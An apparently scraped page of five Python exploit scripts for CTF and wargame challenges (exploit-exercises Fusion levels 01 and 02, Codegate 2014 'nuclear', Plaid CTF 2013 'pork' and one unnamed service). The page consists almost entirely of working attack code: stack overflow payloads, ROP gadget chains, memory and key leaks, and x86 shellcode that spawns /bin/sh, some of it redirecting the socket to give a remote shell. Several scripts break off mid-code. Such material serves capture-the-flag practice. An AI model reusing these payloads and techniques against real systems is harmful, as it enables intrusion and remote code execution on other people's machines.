Exemple #1
0
# exploit-ex fusion level01
from err0rless import connst, dump
from struct import pack

s, t = connst("192.168.95.152", 20001)

sc = ("\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68"
      "\x68\x2F\x62\x69\x6E\x89\xE3\x31\xC9\xCD\x80")

# $ ./ROPgadget -file /opt/fusion/bin/level01 -g -asm "jmp *%esp"
# 0x08049f4f: "\xff\xe4 <==> jmp *%esp"
# 0x080483eb: ff d6        call   *%esi

def pMain():
    p  = "A" * 139
    p += pack("I", 0x08049f4f) # jmp esp
    p += "\x90\x90\xFF\xD6"    # jmp esi opcode

    s.send("GET " + p + " HTTP/1.1" + sc + "\n")

    t.interact()

if __name__ == "__main__":
    pMain()
Exemple #2
0
# exploit-ex fusion level02
from err0rless import connst
from struct import pack

s, t = connst("192.168.95.152", 20002)


def leak_keybuf():
    s.send("E" + pack("I", 128) + "\x00" * 128)
    s.recv(1024)
    key = s.recv(1024)[-128:]

    return key


def cipher(str, key):
    enc = ""
    for i in range(len(str)):
        enc += chr(ord(key[i % 128]) ^ ord(str[i]))

    return enc


def pMain():
    xorkey = leak_keybuf()

    execp = "/bin/sh\x00"  # "/bin/sh"
    execp += pack("I", 0x0804B484)  # {"/bin/sh", 0}
    execp += pack("I", 0x00000000)

    p = "A" * (32 * 4096 + 0x10)
Exemple #3
0
# Codegate 2014 Junior Pwnable nuclear
from err0rless import connst, dump
from struct import pack, unpack

s, t = connst("192.168.95.150", 1129)

# http://shell-storm.org/shellcode/files/shellcode-881.php
# delete `dec %eax`, dup(2) -> dup(4)
sc = ("\x6A\x04\x5B\x6A\x29\x58\xCD\x80\x89\xC6"
      "\x31\xC9\x56\x5B\x6A\x3F\x58\xCD\x80\x41\x80"
      "\xF9\x03\x75\xF5\x6A\x0B\x58\x99\x52\x31\xF6"
      "\x56\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E"
      "\x89\xE3\x31\xC9\xCD\x80")

def leakPasscode():
	print t.read_until("> ")
	s.send("target\n")
	print s.recv(1024)

	s.send("0.1/0.1\n")
	print t.read_until("> ")
	
	s.send("A" * 0x200 + "\n")
	passcode = s.recv(1024)[0x220-2:-2]

	return passcode

def pMain():
	passcode = leakPasscode()

	print t.read_until("> ")
Exemple #4
0
from err0rless import connst
from struct import pack, unpack

s, t = connst("61.105.8.2", 11013)

#s, t = connst("192.168.36.130", 11013)


# ppppr 0x08048F4C
def pMain():
    print t.read_until("Option: ")
    s.send("4\n")

    print s.recv(1024)
    s.send("1\n")

    print s.recv(1024)
    s.send("1\n")

    p = pack("I", 0x08048882)
    p += pack("I", 0x08048986)
    p += pack("I", 0x0804B1B8)

    print s.recv(1024)
    s.send("A" * 58 + pack("I", 0x0804B1B4) + p)

    p = pack("I", 0x08048540)  # write
    p += pack("I", 0x08048F4C + 3)
    p += pack("I", 0x0804B010)

    p += pack("I", 0x080484E0)  # read
Exemple #5
0
# Plaid CTF 2013 Pwnable pork
from err0rless import connst
from struct import pack, unpack
from time import sleep

s, t = connst("192.168.95.150", 33227)

sc = ("\x6A\x04\x5B\x6A\x29\x58\xCD\x80\x89\xC6"
      "\x31\xC9\x56\x5B\x6A\x3F\x58\xCD\x80\x41\x80"
      "\xF9\x03\x75\xF5\x6A\x0B\x58\x99\x52\x31\xF6"
      "\x56\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E"
      "\x89\xE3\x31\xC9\xCD\x80")

read_gadgets = [
    0x804ac98,  # point read.plt
    0x8049a58,
    0x8048b31,
    0x8049910,
    0x8049990,  # bss + 0x50
    0x8049910,
    0x8049b70,
    0x8049b70,
    0x8049b70,  # 0x00000004
    0x8049a58,
    0x8048b31,
    0x8049910,
    0x8049990,  # bss + 0x50
    0x8049a28,
    0x8049b70,
    0x8049b70,
    0x8049b70